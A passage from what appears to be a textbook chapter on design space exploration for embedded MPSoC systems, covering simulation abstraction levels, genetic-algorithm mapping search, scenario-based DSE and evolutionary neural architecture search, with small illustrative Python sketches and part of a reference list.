Simulative Fitness Evaluation
Fig. 5 Different levels of abstraction for (a) simulating processors and (b) simulating communication
Simulation at the register transfer level (RTL) provides the highest accuracy, as it captures the cycle- and signal-accurate behavior of a design. Its very low simulation speed, however, makes it suitable only for small (sub)systems, for example, the design of one specific system component. Performing system-level DSE is infeasible using RTL simulation.
Raising the level of abstraction, one can simulate system components at the
cycle-accurate level. This means that the system components are simulated on a
cycle-by-cycle basis and, as such, that the simulated system state conforms to
the cycle-by-cycle behavior of the target design. This results in more efficient
simulation as compared to RTL simulation at the cost of a somewhat reduced
accuracy since the system state in between cycles is not accounted for. Cycle-
accurate simulation is a popular technique for simulating microprocessors (see also
Chap. 25, “Processor Simulation and Characterization”): so-called cycle-accurate
instruction set simulation (ISS). These ISS simulators try to capture the cycle-by-
cycle behavior of the micro-architectural components of a microprocessor, such as
the pipeline logic, out-of-order processing, branch predictors, caches, and so on. To
account for power consumption behavior, ISS simulators often use activity-based
power models that accumulate the power consumption of the relevant micro-
architecture components based on their activity ratio. A good example is the widely
used cycle-accurate Gem5 ISS (Binkert et al. 2011), which can be extended to
also support area and power predictions using activity-based modeling frameworks
such as CACTI (Thoziyoor et al. 2008) and McPAT (Li et al. 2013). Although these
ISS simulators can be deployed to perform micro-architectural DSE for processor
components, they are generally still too slow for performing full system-scale DSE
of multicore-based embedded systems.
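The accumulation principle of such activity-based power models can be sketched as follows; the component names, per-access energies, and leakage value below are made-up placeholders rather than numbers from CACTI or McPAT:

```python
# Hypothetical per-access energies (in pJ) for a few micro-architectural
# components; a real flow would obtain these from tools such as CACTI/McPAT.
ENERGY_PJ = {"icache": 10.0, "dcache": 12.0, "alu": 2.0, "fpu": 8.0}
LEAKAGE_MW = 5.0  # assumed static power of the whole core, in mW

def estimate_power_mw(activity_counts: dict, cycles: int, freq_mhz: float) -> float:
    """Accumulate dynamic energy from per-component activity counts and
    convert it into average power over the simulated interval."""
    dynamic_pj = sum(ENERGY_PJ[c] * n for c, n in activity_counts.items())
    seconds = cycles / (freq_mhz * 1e6)
    return dynamic_pj * 1e-9 / seconds + LEAKAGE_MW  # pJ/s -> mW, plus leakage

print(estimate_power_mw({"icache": 5000, "dcache": 1800, "alu": 4000},
                        cycles=10000, freq_mhz=500.0))
```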
In cycle-accurate ISS simulators, the fetching, decoding, and execution of
instructions are explicitly simulated. To further optimize the speed of such simula-
tors, one could translate the instructions from the target binary to be simulated to an
equivalent sequence of instructions (using static or dynamic just-in-time translation)
that can be executed on the simulation host computer. This so-called binary
translation technique, which is, for example, deployed in the widely used QEMU
simulator (Bellard 2005), aims at reducing the overhead of explicitly simulating the
instruction fetch and decode stages. The translated instruction sequences are often
instrumented with additional code to keep track of the extra-functional behavior,
such as timing and power consumption, of the original code as it would have
been executed on the target processor. In some cases, however, ISS simulators
and especially binary translation-based simulators only focus on mimicking the
functional behavior and do not capture the extra-functional behavior of the target
processor. In these cases, they are usually referred to as emulators rather than
simulators.
For simulating communication between system components, one could use
so-called bus-cycle-accurate simulation (Cai and Gajski 2003) to speed up the
simulation process. In this type of simulation, all signals of the communication
bus are modeled explicitly in a cycle-accurate fashion, but this accuracy is only
maintained for the signals on the communication bus and not for the logic around
it. The surrounding components can thus use more abstract timing models.
Raising the abstraction level even further for processor simulation yields so-
called host-compiled simulation (Ceng et al. 2009; Bringmann et al. 2015). In this
technique, the source code of the target program is directly compiled into a binary
program that can run on the host computer. In addition, and similar to the binary
translation technique, the source code can be instrumented with a timing and power
consumption model based on the target architecture. Since this type of simulation
is efficient as it directly executes target programs on the host computer, it is very
suitable for system-level DSE. However, at this level of abstraction, it is difficult to
accurately capture intricate micro-architectural behavior, like pipeline and caching
behavior. Another drawback of this simulation approach is that one needs to have
access to the source code of a target program.
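The back-annotation principle of host-compiled simulation can be illustrated with a toy sketch: the functionality executes natively on the host, while assumed per-block cycle costs (in a real flow derived from the compiled target binary) are accumulated on the side:

```python
class TimingModel:
    """Toy back-annotation model: the program runs at host speed, while
    annotate() accumulates target-processor cycles per basic block."""
    def __init__(self):
        self.cycles = 0
    def annotate(self, block_cycles: int):
        self.cycles += block_cycles

# Hypothetical per-block cycle costs; these are assumptions for illustration,
# not values measured on any particular target processor.
COST = {"setup": 40, "loop_body": 12}

def dot(a, b, tm: TimingModel) -> float:
    tm.annotate(COST["setup"])
    acc = 0.0
    for x, y in zip(a, b):              # functionality executes natively ...
        acc += x * y
        tm.annotate(COST["loop_body"])  # ... timing is back-annotated
    return acc

tm = TimingModel()
print(dot([1, 2, 3], [4, 5, 6], tm), "in", tm.cycles, "target cycles")
```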
For simulating communications, transaction-level modeling (TLM) (Cai and
Gajski 2003) provides the highest level of abstraction. In TLM, communication
details at the level of signals and protocols are abstracted away by means of
encapsulation into entire transactions between system components. At this level,
the emphasis is more on the functionality of the data transfers, i.e., what data are
transferred to and from what locations, rather than on their actual implementation.
Evidently, the extra-functional behavior in TLM simulation models is also captured
at the level of entire transactions.
The above processor simulation techniques are all execution-driven simulation
methods as they are directly driven by the execution of a program. Alternatively,
there are also trace-driven simulation techniques in which the simulation is driven
by event traces that have been collected through the execution of a program (e.g.,
Butko et al. 2015; Castrillon et al. 2010). These trace events can focus on the
evaluation of specific system elements such as memory access address traces for
cache simulation (Uhlig and Mudge 1997). However, an event trace may also consist
of the full sequence of executed instructions, thereby allowing full, trace-driven
microprocessor simulation for the purpose of performance and/or power estimation.
To optimize for simulation speed, the trace events may also represent computations
Fig. 6 Trace-driven simulation: application models (e.g., an MP3 encoder and a video decoder) generate event traces that are scheduled onto an architecture model consisting of processors and memory
Searching the Design Space
Since exhaustive evaluation is usually infeasible, DSE typically deploys metaheuristic search techniques that try to find the best solution in the known design space that meets the design requirements as best as possible. To
this end, these methods search the design space for optimal solutions using only a
finite number of design point evaluations and can thus handle larger design spaces.
However, there is no guarantee that the global optimum will be found using meta-
heuristics, and therefore the result can be a local optimum within the design space.
Examples of metaheuristics are hill climbing, tabu search, simulated annealing,
ant colony optimization, particle swarm optimization, and genetic algorithms (GA)
(Panerati et al. 2017). In this chapter, the focus will be on methods to navigate
the design space that are based on GA. GA-based DSE has been widely studied
in the domain of system-level embedded design (e.g., Palesi and Givargis 2002;
Madsen et al. 2006; Erbas et al. 2006; Quan and Pimentel 2014; Goens et al.
2016) and has demonstrated to yield good results. Moreover, GAs can be used
in their basic (domain-independent) form or, as will also be explained later on,
with custom extensions that incorporate domain-dependent knowledge in order to
improve search performance even further.
GA-Based DSE
GAs operate by searching through the solution space (spanned by the design
variables/decisions being explored) where each possible solution is encoded as
a string-like representation, often referred to as the chromosome (Beasley et al.
1993). A (randomly initialized) population of these chromosomes is then iteratively
modified by performing a fixed sequence of actions that are inspired by their
counterparts from biology: fitness evaluation and selection, crossover, and mutation.
A fundamental design choice of a GA is the genetic representation of the solution
space, because each of the crossover and mutation steps depends on it. To illustrate
how such a genetic representation could look like, let us use a widely studied DSE
problem in the domain of system-level embedded systems design as an example:
optimizing the mapping of a (set of) concurrent application(s) onto an underlying
(heterogeneous) MPSoC platform architecture (Singh et al. 2013). As a convenient
mapping description for an application with n tasks, a vector of size n is used with
processor identifiers pi , where pi indicates the mapping target of task i:
[p0, . . . , pi, . . . , pn−1]
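In code, such a mapping chromosome is simply a list of processor identifiers, one entry per task. The following is a minimal sketch, with assumed task and processor counts, of the encoding and the random initialization used to seed a GA population:

```python
import random

N_TASKS, N_PROCS = 6, 4   # assumed problem size, for illustration only

def random_mapping(rng: random.Random) -> list:
    """A chromosome: position i holds the processor id that task i maps to."""
    return [rng.randrange(N_PROCS) for _ in range(N_TASKS)]

rng = random.Random(42)
print(random_mapping(rng))  # e.g. [0, 2, 1, ...]: task 0 on P0, task 1 on P2, ...
```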
Fig. 7 GA-based mapping DSE, illustrated for an example task graph (tasks A–F) mapped onto a platform with four processors (P0–P3) and a shared memory: (a) general overview of the GA steps and (b) uniform, one-point, and two-point crossover and mutation operators
The population for the next search iteration can then be formed by simply replacing the old population with the new offspring or by deploying so-called elitism. Such elitism involves combining the new offspring with a small number of the best solutions from the original population to avoid losing strong solutions.
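Putting these steps together, a minimal GA-based mapping DSE loop could look as follows. The load-balancing fitness function is only a stand-in for a real fitness evaluation (e.g., a Sesame simulation), and all parameter values are assumptions:

```python
import random

rng = random.Random(1)
N_TASKS, N_PROCS = 6, 4            # assumed problem size
POP, GENS, ELITE = 20, 50, 2       # assumed GA parameters

def fitness(m):
    """Placeholder objective: load imbalance across processors (lower is
    better); real DSE would obtain fitness from, e.g., a simulation."""
    loads = [m.count(p) for p in range(N_PROCS)]
    return max(loads) - min(loads)

def uniform_crossover(a, b):
    return [x if rng.random() < 0.5 else y for x, y in zip(a, b)]

def mutate(m, rate=0.1):
    return [rng.randrange(N_PROCS) if rng.random() < rate else g for g in m]

pop = [[rng.randrange(N_PROCS) for _ in range(N_TASKS)] for _ in range(POP)]
for _ in range(GENS):
    pop.sort(key=fitness)
    elite = pop[:ELITE]                  # elitism: keep the best solutions
    parents = pop[:POP // 2]             # simple truncation selection
    children = [mutate(uniform_crossover(rng.choice(parents), rng.choice(parents)))
                for _ in range(POP - ELITE)]
    pop = elite + children               # new population with fresh genetic material

best = min(pop, key=fitness)
print(best, fitness(best))
```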
To provide a small example of the results a GA-based DSE could obtain, some
results are presented of a small-scale case study where the design space consists
of an application with 11 tasks that is to be mapped onto a four-core MPSoC
architecture with a crossbar interconnect (Thompson 2012). The mapping design
space contains more than 4 million design points. Of these design points, 175K are
unique ones since the target platform is a homogeneous, symmetric MPSoC and, as
a consequence, exhibits mapping symmetries. Because of the relatively small design
space, in this particular case, it was also possible to perform an exhaustive search,
allowing a quality evaluation of the GA-based search results. To account for the
stochastic behavior of GAs, all results are averages over 300 GA runs. The fitness
of mapping solutions has been evaluated using the Sesame MPSoC simulation
framework (Pimentel et al. 2006; Erbas et al. 2007) (see also section “Simulative
Fitness Evaluation”). Figure 8 shows the results of the GA-based DSE with
different population sizes (10, 15, 40, or 80 chromosomes), a constant mutation
rate (0.1) and crossover probability (0.9), and a uniform crossover in a so-called P-Q
(probability-quality) plot. Regarding the top part of this plot, the horizontal axis (top
x-axis) represents the quality of the result as a percentile toward the true optimum
(a lower percentile indicates a result closer to the optimum), and the vertical axis
represents the probability of achieving a result with that quality. The straight lines
in the graph represent the theoretically derived probabilities of finding results using
a simple, uniform random search. The 80–95% confidence intervals of the mean
fitness value (execution time in cycles, in this case) of mapping solutions found by
the GA were also computed, averaged over the 300 runs of each GA search. These
Fig. 8 P-Q plot for GA-based DSE with different population sizes
confidence intervals, shown at the bottom of the graph in Fig. 8, indicate the degree
of certainty (as specified by the confidence level) that the real mean lies within the
confidence interval. The more the confidence intervals for different experiments are
nonoverlapping, the more significant the difference of the mean behavior (which is
clearly the case in the example of Fig. 8). The results from this particular case study
show that the GA-based DSE with the largest population size can find mapping
solutions that are always very close to the real optimum: within the 0.1 percentile, implying that they belong to the best 175K/1000 = 175 solutions. A larger population size,
however, comes with a higher number of fitness evaluations during the search and
thus requires a longer search time (assuming the number of search iterations remains
constant). According to Fig. 8, a population size of 40 may therefore provide a good
compromise.
Optimizing GA-Based DSE
There are various methods for making the search process of a GA-based DSE more
efficient. This allows the DSE process to either find the design candidates quicker
(i.e., improve the convergence behavior of the DSE) or to spend the same amount
of time to evaluate more design points. The latter can be used to enable the search
of larger design spaces or to improve the chance of finding better design candidates
(i.e., improve the confidence property of the DSE). One approach for optimizing
the GA-based search is to enrich the genetic operators of the GA with domain
knowledge such that they produce more diverse offspring or offspring with a higher
probability of being closer to the optimum. For example, in Thompson and Pimentel
(2013), new GA operators have been proposed that optimize the search performance
by (1) reducing the redundancy present in chromosome representations (e.g.,
mapping symmetries (Goens et al. 2017) in the case of homogeneous, symmetrical
MPSoC platforms) or (2) using a new crossover operator that is based on a mapping
distance metric that provides a measure of similarity between mappings. Using this
mapping distance information, the new crossover operator aims at retaining the
strong chromosome parts of both of the parents. In Quan and Pimentel (2014), a
new mutation operator has been proposed that considers the affinity of tasks with
respect to processors, the communication cost between tasks, and the differences of
processor workloads to steer the mutation in such a way that offspring is produced
with a higher probability of being (near-)optimal.
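The mapping distance idea can be illustrated with a simple Hamming-style measure; the actual metric of Thompson and Pimentel (2013) may be defined differently, so this is merely a plausible sketch:

```python
def mapping_distance(m1, m2):
    """Count the tasks that the two mappings place on different processors;
    a small distance means the mappings are similar."""
    return sum(a != b for a, b in zip(m1, m2))

print(mapping_distance([0, 2, 1, 1, 3, 0], [0, 2, 2, 1, 3, 1]))  # -> 2
```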
Another approach for optimizing GA-based DSE concerns the reduction of
the time taken to evaluate the fitness of solutions during the GA’s execution. As
mentioned before, DSE approaches typically use either simulation or an analytical
model to evaluate the fitness of design points, where simulative approaches prohibit
the evaluation of many design options due to their higher evaluation costs, and analytical approaches suffer from accuracy issues. Therefore, in Piscitelli
and Pimentel (2012a), a hybrid form of mapping DSE has been proposed that
combines simulation with analytical estimations to prune the design space in terms
of application mappings that need to be evaluated using simulation. To this end,
the DSE technique uses an analytical model that estimates the expected throughput
of an application given a certain architectural configuration and application-to-
architecture mapping. In the majority of the search iterations of the DSE process,
this analytical throughput estimation avoids the use of simulation to evaluate the
design points. However, since the analytical estimations may in some cases be
less accurate, the analytical estimations still need to be interleaved with simulative
evaluations in order to ensure that the DSE process is steered into the right direction
(Piscitelli and Pimentel 2012b). A similar approach is taken in Mariani et al. (2010),
where an iterative DSE methodology is proposed exploiting the statistical properties
of the design space to infer, by means of an empirical analytic model, the design
points to be analyzed with low-level simulation. The knowledge of a few design
points is used to predict the expected improvement of unknown configurations.
Alternatively, in hierarchical DSE (e.g., Mohanty et al. 2002; Jia et al. 2013,
2014), DSE is first performed using analytical or symbolic models to quickly
find the interesting parts in the design space. Hereafter, simulation-based DSE is
performed on the selected sweet spots in the design space to more accurately search
for the optimal design points.
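The interleaving idea behind such hybrid DSE can be sketched as follows; both evaluators are toy stand-ins for a real analytical throughput model and a real simulator:

```python
import random
rng = random.Random(7)

def analytical_fitness(mapping):
    """Fast but approximate estimate (toy: true value plus noise)."""
    return sum(mapping) + rng.uniform(-0.5, 0.5)

def simulated_fitness(mapping):
    """Slow but accurate evaluation (toy stand-in for a simulator)."""
    return float(sum(mapping))

def hybrid_evaluate(candidates, sim_every=10):
    """Evaluate most candidates analytically, but interleave a simulative
    evaluation every sim_every-th candidate to keep the search on track."""
    scored = []
    for i, m in enumerate(candidates):
        value = simulated_fitness(m) if i % sim_every == 0 else analytical_fitness(m)
        scored.append((value, m))
    return sorted(scored)          # best (lowest) fitness first

cands = [[rng.randrange(4) for _ in range(6)] for _ in range(30)]
print(hybrid_evaluate(cands)[0])
```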
Multi-application Workload Models
The DSE techniques discussed so far focus on the evaluation and exploration of
MPSoC architectures under static, single-application workloads. Today’s MPSoC
systems, however, often require supporting an increasing number of applications
and standards, where multiple applications can run simultaneously and concurrently
contend for system resources (Thompson and Pimentel 2007; Castrillon et al. 2013).
For each single application, there may also be different execution modes (or program
phases) with different computational and communication requirements. For exam-
ple, in software-defined radio appliances, a radio may change its behavior according
to resource availability, such as the long-term evolution (LTE) standard which uses
adaptive modulation and coding to dynamically adjust modulation schemes and
transport block sizes based on channel conditions. Or a video application could
dynamically lower its resolution to decrease its computational demands in order to
save battery life. As a consequence, the behavior of application workloads executing
on the embedded system can change dramatically over time.
As illustrated in Fig. 9, there are several approaches for dealing with multi-
application workloads in the context of DSE. A commonly used approach is to
consider the applications in isolation, as illustrated in Fig. 9a. This implies that
each of the applications in the multi-application workload will be mapped to a
different, isolated part of the system. As a consequence, the DSE for each of
these applications can also be performed in isolation. However, this approach
typically leads to overdesigned systems since there is no or limited resource
sharing between applications. Another approach, illustrated in Fig. 9b, makes the
pessimistic assumption that all applications that can be executed on the system
will always be active (and will thus be contending for system resources). Again,
Fig. 9 DSE for multi-application workloads on a three-core, bus-based MPSoC: (a) DSE with
application isolation, (b) pessimistic DSE, and (c) scenario-based DSE
performing DSE with such an assumption may lead to highly overdesigned systems,
as in reality the concurrent activation of all possible applications may be unlikely.
To address the problem of overdesigning systems and to capture the dynamism in
application workload behavior during the design process, the DSE could employ
the concept of application scenarios (Gheorghita et al. 2009), leading to scenario-
based DSE (van Stralen and Pimentel 2010a, 2013; Pimentel and van Stralen 2017;
Castrillon et al. 2013). This is illustrated in Fig. 9c. The remainder of this section
will discuss the concepts of application scenarios and scenario-based DSE, again
using the example of application mapping exploration for illustration purposes.
Scenario-Based DSE
Fig. 10 Application scenarios composed from per-application modes, e.g., a video decoder with simple and advanced modes and an mp3 player with mono and stereo sound
An application scenario describes a combination of applications that are simultaneously active, together with their execution modes. Figure 10 illustrates this for three multimedia applications (an mp3 player, a video decoder, and a GSM application), each with two application modes.
The number of different application scenarios grows exponentially with the
number of applications involved. So, to perform DSE with these application
scenarios, scenario-based DSE needs to solve the problem that the total number
of possible application scenarios is too large to exhaustively evaluate the fitness
of design points with all of these scenarios. Therefore, a small but representative
subset of application scenarios must be selected for the evaluation of MPSoC design
points. This representative subset must be used for comparing mappings and should
lead to the same performance ordering as would have been produced when the
complete set of the application scenarios would have been used. That is, if mapping
m1 is better than mapping m2, the representative subset should be able to give a
better predicted fitness to mapping m1 than it assigns to mapping m2. However,
the selection of such a representative subset is not trivial (Pimentel and van Stralen
2017). This is because the representative subset is dependent on the current set of
mappings that are being explored. Depending on the set of mappings, a different
subset of application scenarios may reflect the relative mapping qualities of the
majority of the application scenarios.
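The ordering-preservation requirement can be made concrete in a small sketch, in which an arbitrary toy per-scenario fitness stands in for a real simulation of a mapping under a scenario:

```python
import random
rng = random.Random(3)

N_SCENARIOS, SUBSET_SIZE = 100, 10   # assumed numbers, for illustration only

def scenario_fitness(mapping, s):
    """Toy stand-in for simulating `mapping` under application scenario s."""
    return sum((g + 1) * ((s * 13 + i) % 7) for i, g in enumerate(mapping))

def predicted_fitness(mapping, scenarios):
    return sum(scenario_fitness(mapping, s) for s in scenarios) / len(scenarios)

m1, m2 = [0, 2, 1, 3, 0, 1], [3, 3, 2, 0, 1, 2]
full = range(N_SCENARIOS)
subset = rng.sample(range(N_SCENARIOS), SUBSET_SIZE)

# A representative subset should predict the same ordering as the full set:
print(predicted_fitness(m1, full) < predicted_fitness(m2, full),
      predicted_fitness(m1, subset) < predicted_fitness(m2, subset))
```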
As a result, the representative subset cannot be statically selected. For a static
selection, one would need to have a large fraction of the mappings that are going
to be explored during the MPSoC DSE. However, since these mappings are only
available during DSE, a dynamic selection method must be used. Thus, both the
set of optimal mappings and the representative subset of scenarios need to be
co-explored simultaneously such that the representative subset is able to adapt to
the set of mappings that are currently being explored (van Stralen and Pimentel
2010a, 2013; Pimentel and van Stralen 2017). Figure 11 shows the scenario-
based DSE framework. The left part of the picture provides a general overview
of the exploration flow, whereas the right part illustrates the scenario-based DSE in
more detail. As input, the scenario-based DSE requires a database of application scenarios.
Fig. 11 The scenario-based DSE framework, consisting of a design explorer that searches for the best candidate designs (mappings of the application models onto the architecture model, evaluated with Sesame) and a subset selector that maintains a representative subset of scenarios from the application scenario database
Fig. 12 Quality of the scenario-based DSE for the different subset selection approaches (HYB, GA, and FS) and subset sizes (1%, 4%, and 8%). The quality is determined based on the distance between the estimated Pareto front and the optimal front
The GA-based subset selector is capable of quickly exploring the space of potential scenario subsets, but due to its stochastic
nature, it is susceptible to missing the optimal scenario subsets. This is not the case
with the FS algorithm as it more systematically explores the local neighborhood of
a scenario subset.
To give a feel for the performance of the three different fitness prediction
techniques, Fig. 12 shows the results of a scenario-based DSE experiment in which
the three techniques are compared for three different scenario subset sizes: 1%,
4%, and 8% of the total number of application scenarios. In this experiment, the
mapping of ten applications with a total of 58 tasks and 75 communication channels
is explored. The multi-application workload consists of 4607 different application
scenarios in total. The target platform is a heterogeneous MPSoC with four general-
purpose processors, two ASIPs and two ASICs, all connected using a crossbar
network. In this experiment, a DSE with a fixed duration of 100 min is performed
for all three subset selector approaches. The results have been averaged over nine
runs. To evaluate the fitness of mapping solutions, the Sesame MPSoC simulation
framework (see section “Simulative Fitness Evaluation”) is again deployed. To
determine the efficiency of the multi-objective DSE, the distance of the estimated
Pareto front (execution time versus energy consumption of mapping solutions) to
the optimal Pareto front is obtained. For this purpose, the execution time and energy
consumption are normalized to a range from 0 to 1. As the optimal Pareto front is
not exactly known since the design space is too large to be exhaustively searched,
the combined Pareto front of all performed experiments is used for this.
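This distance-based quality metric can be computed as in the following sketch, which normalizes both objectives to [0, 1] and averages, for each estimated Pareto point, the distance to the nearest point of the reference front; the point sets are illustrative:

```python
import math

def normalize(points):
    """Scale each objective (execution time, energy) of a point set to [0, 1]."""
    lo = [min(p[d] for p in points) for d in range(2)]
    hi = [max(p[d] for p in points) for d in range(2)]
    return [tuple((p[d] - lo[d]) / ((hi[d] - lo[d]) or 1) for d in range(2))
            for p in points]

def front_distance(estimated, reference):
    """Average Euclidean distance from each estimated Pareto point to the
    nearest point of the reference (combined) front, after normalization."""
    pts = normalize(list(estimated) + list(reference))
    est, ref = pts[:len(estimated)], pts[len(estimated):]
    return sum(min(math.dist(e, r) for r in ref) for e in est) / len(est)

estimated = [(10.0, 3.0), (8.0, 5.0)]      # illustrative (time, energy) points
reference = [(9.0, 2.5), (7.5, 4.0), (6.0, 6.0)]
print(front_distance(estimated, reference))
```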
The size of the scenario subset provides a trade-off between accuracy and
convergence of the search. That is, a larger scenario subset will lead to a more
accurate fitness prediction of mappings in the design explorer at the cost of a larger
computational overhead to obtain the fitness of a single mapping, causing a slower
convergence of the search. This can be seen in Fig. 12. The GA and the FS subset
selection methods have worse results when the subset becomes larger (remember
that a fixed DSE duration of 100 min is used). For a subset size of 4%, the hybrid
selector is, however, still able to benefit from a subset with a higher accuracy. The
slower convergence only starts to affect the efficiency for the 8% subset. Comparing
the different methods, the hybrid method shows the best results. The only exception
is for the 1% subset. In this case, the GA is still able to search the smaller design
space of possible subsets. Still, the result of the hybrid method at 4% is better than
the result of the GA at 1%. With the larger subset sizes, the hybrid method can
exploit both the benefits of the FS and the GA.
Application Exploration
NAS by Means of Evolutionary Piecemeal Training (EPT)
The neural architecture search (NAS) approach that will be described searches for an efficient convolutional
neural network (CNN) architecture. To this end, it leverages a GA, which allows
a group of candidate CNNs in the GA’s population to train in parallel. In most
NAS techniques, training of a neural network is considered a separate task or a
performance estimation strategy to perform the neural network architecture search.
However, the approach described here considers NAS from a different perspective, as it aims at finding optimal CNN architectures during the training process itself.
Evolutionary Operators
The crossover operator in the EPT-based NAS works with two neural networks
and swaps all layers in a gene block of the same type. In this replacement, the
layers being swapped are roughly in the same phase of feature extraction. The input
and output feature map sizes of the layer block being swapped are also identical
Fig. 13 The crossover operator swapping blocks of convolutional layers between two candidate networks (other layer types shown: Pool, FC, Softmax)
in both of the selected networks. Figure 13 illustrates the crossover operator for
swapping convolutional layers from two networks. Crossover is not a function-preserving operator, but in experiments it was found to be important for introducing diversity in the population by changing the total number of layers in a candidate through swapping. To reduce the negative effect of the training loss incurred due to crossover, a cooling-down approach is applied to the crossover rate: in earlier GA iterations, where the training loss is still high anyway, more swaps happen than in later ones, where the training loss is very low.
The mutation operator changes a layer's parameters, such as the number of kernels or the kernel size, and is designed to be function preserving. Every mutation disrupts the ongoing training of the mutated candidate, and some additional loss is incurred in the training process. However, due to the function-preserving nature of the mutation operator, this loss is as small as possible and recoverable in later piecemeal training.
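A rough sketch of how such operators could act on a simple list-based network encoding is shown below; the encoding, the choice of the leading convolutional block, and the widening mutation are illustrative simplifications, not the actual EPT operators:

```python
import random
rng = random.Random(0)

# A candidate CNN encoded as a list of (layer_type, parameter) tuples; the
# structure here is an illustrative assumption, not the paper's encoding.
net_a = [("conv", 32), ("conv", 32), ("pool", 2), ("conv", 64), ("fc", 10)]
net_b = [("conv", 16), ("conv", 48), ("conv", 48), ("pool", 2), ("fc", 10)]

def leading_conv_block(net):
    """Indices of the leading (assumed contiguous) block of conv layers."""
    idx = []
    for i, (layer_type, _) in enumerate(net):
        if layer_type != "conv":
            break
        idx.append(i)
    return idx

def crossover(a, b):
    """Swap the same-type layer blocks of two candidates; note that this
    can change the total number of layers of both children."""
    ia, ib = leading_conv_block(a), leading_conv_block(b)
    child_a = [b[i] for i in ib] + a[ia[-1] + 1:]
    child_b = [a[i] for i in ia] + b[ib[-1] + 1:]
    return child_a, child_b

def mutate(net):
    """Mutation in the spirit of function preservation: widen one conv layer."""
    i = rng.choice([i for i, (t, _) in enumerate(net) if t == "conv"])
    layer_type, kernels = net[i]
    net[i] = (layer_type, kernels * 2)
    return net

child_a, child_b = crossover(net_a, net_b)
print(mutate(child_a))
```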
NAS Results
To illustrate the competence and versatility of the EPT-based NAS concept, a
range of experiments were performed with datasets from two different domains:
CIFAR-10 for image classification (Deng et al. 2009) and PAMAP2 for human
activity recognition (Reiss and Stricker 2012). For CIFAR-10, the search took
two GPU-days, and the best prediction accuracy was found to be 92.5% on the
test set. Table 1 shows comparisons with other evolutionary NAS approaches,
where EPT refers to evolutionary piecemeal training. It may seem that 92.5% is relatively low compared to other published works, but this result is achieved on a very simple and plain CNN without any architectural enhancements or advanced data augmentation.
Other approaches use a hybrid search space where different architecture blocks or
cell modules as well as arbitrary skip connections are used. Instead of stacking
conventional layers, these stack different blocks. The best model found in the
EPT experiments has 13 convolutional layers followed by two fully connected
layers. For the PAMAP2 dataset, the EPT search took only 10 GPU-hours, and the
best prediction accuracy was 94.36%. Compared to state-of-the-art neural network
solutions for this particular dataset, EPT outperforms all other known efforts. The
best performance was found on a neural network that has seven convolutional layers
followed by three fully connected layers. The interested reader is referred to Sapra
and Pimentel (2020a) for a more detailed analysis of EPT’s experimental results.
Conclusion and Outlook
In this chapter, an overview was presented of techniques and methods for DSE
of embedded systems. The discussion was organized along the lines of the two
primary elements of DSE: the evaluation of single design points and the search
strategy for covering the design space. The overview is certainly not meant to be
exhaustive. For example, the discussion mainly focused on popular GA-based DSE,
optimizing system performance and, to some extent, power/energy consumption.
The optimization of other important design objectives, such as system reliability
(e.g., addressed in Jhumka et al. 2005; Glaß et al. 2007, 2008; van Stralen and
Pimentel 2012), has not been covered.
There are still many open research challenges for this domain. For example,
embedded systems more and more need to become adaptive systems due to
increasingly dynamic application workload behavior (as was previously discussed);
the need for quality-of-service management to dynamically trade off different
system qualities such as performance, precision, and power consumption; and the
fact that a technology level has been reached at which digital circuits are no longer fully reliable, increasing the chances of transient and permanent faults. This calls for
research to take system adaptivity, in which a system can continuously reconfigure
and customize itself at run time according to the application workload at hand
and the state of the system (e.g., Singh et al. 2013; Quan and Pimentel 2015,
2016a,b; Goens et al. 2017; Khasanov and Castrillon 2020), into account in the
process of DSE. In the case of adaptive systems, a DSE process cannot easily
compare different design choices by, e.g., simply evaluating the performance or
power/energy consumption of an application workload executing on a specific
platform architecture. That is, the reconfiguration behavior (i.e., when and how
the system reacts to “disruptive events” that trigger system reconfigurations) of
the system and the performance/power consumption consequences of such system
adaptivity actions must be taken into account when comparing different design
instances. This calls for efficient and effective methods that allow for evaluating
and optimizing adaptive embedded systems designs such that the way the system
instances and their extra-functional behavior evolve over time is also captured.
Another research direction that is worth mentioning involves the introduction of
new design objectives in the process of (early) DSE, in addition to the traditional
objectives such as system performance, power/energy consumption, system cost,
and reliability. Arguably, a good example is the need for taking system security
into account as an optimization objective (Pimentel 2020). As embedded systems
are becoming increasingly ubiquitous and interconnected, they attract a worldwide
attention of attackers, which makes the security aspect more important than ever
during the design of those systems. Currently, system security is still mostly
considered as an afterthought and is typically not taken into account during the
very early design stages. However, any security measure that may eventually be
taken later in the design process does affect the already established trade-offs
with respect to the other system objectives such as performance, power/energy
consumption, cost, etc. Thus, covering the security aspect in the earliest phases
of design is necessary to design systems that are, in the end, optimal with regard
to all system objectives. However, this poses great difficulties because unlike
the earlier mentioned conventional system objectives like performance and power
consumption, security is hard to quantify. This necessitates research on techniques
that make it possible to incorporate security as an objective in early DSE.
At this moment, the integration of security aspects in the process of system-
level DSE of embedded systems is still a largely uncharted research ground. Only a
few efforts exist that address this problem, but they typically provide only partial
solutions or solutions to very specific security problems (e.g., Lin et al. 2015;
Weichslgartner et al. 2016; Stierand et al. 2014; Tan et al. 2017). Moreover, in most
of these works, security is modeled as a requirement in the DSE process, which does
not allow for studying actual trade-offs between performance, power consumption,
and cost in relationship to secureness of a design. Only a handful of research efforts,
such as Ferrante et al. (2013) and Gressl et al. (2019), seem to have been aiming at
incorporating security as an objective that can be traded off with other objectives
during early DSE.
References
Balarin F, Sentovich E, Chiodo M, Giusto P, Hsieh H, Tabbara B, Jurecska A, Lavagno L, Passerone
C, Suzuki K, Sangiovanni-Vincentelli A (1997) Hardware-software co-design of embedded
systems – the POLIS approach. Kluwer Academic Publishers, Norwell
Beasley D, Bull DR, Martin RR (1993) An overview of genetic algorithms: part I-fundamentals.
Univ Comput 15(2):58–69
Bellard F (2005) Qemu, a fast and portable dynamic translator. In: Proceedings of the USENIX
annual technical conference, pp 41–46
Binkert N et al (2011) The gem5 simulator. SIGARCH Comput Archit News 39(2):1–7
Bringmann O, Ecker W, Gerstlauer A, Goyal A, Mueller-Gritschneder D, Sasidharan P, Singh S
(2015) The next generation of virtual prototyping: ultra-fast yet accurate simulation of hw/sw
systems. In: Proceedings of the international conference on design, automation & test in Europe
(DATE), pp 1698–1707
Butko A, Garibotti R, Ost L, Lapotre V, Gamatie A, Sassatelli G, Adeniyi-Jones C (2015) A trace-
driven approach for fast and accurate simulation of manycore architectures. In: Proceedings of
the Asia and South Pacific design automation conference (ASP-DAC), pp 707–712
Cai L, Gajski D (2003) Transaction level modeling: an overview. In: Proceedings of the
international conference on hardware/software codesign and system synthesis (CODES+ISSS),
pp 19–24
Castrillon J, Velasquez R, Stulova A, Sheng W, Ceng J, Leupers R, Ascheid G, Meyr H (2010)
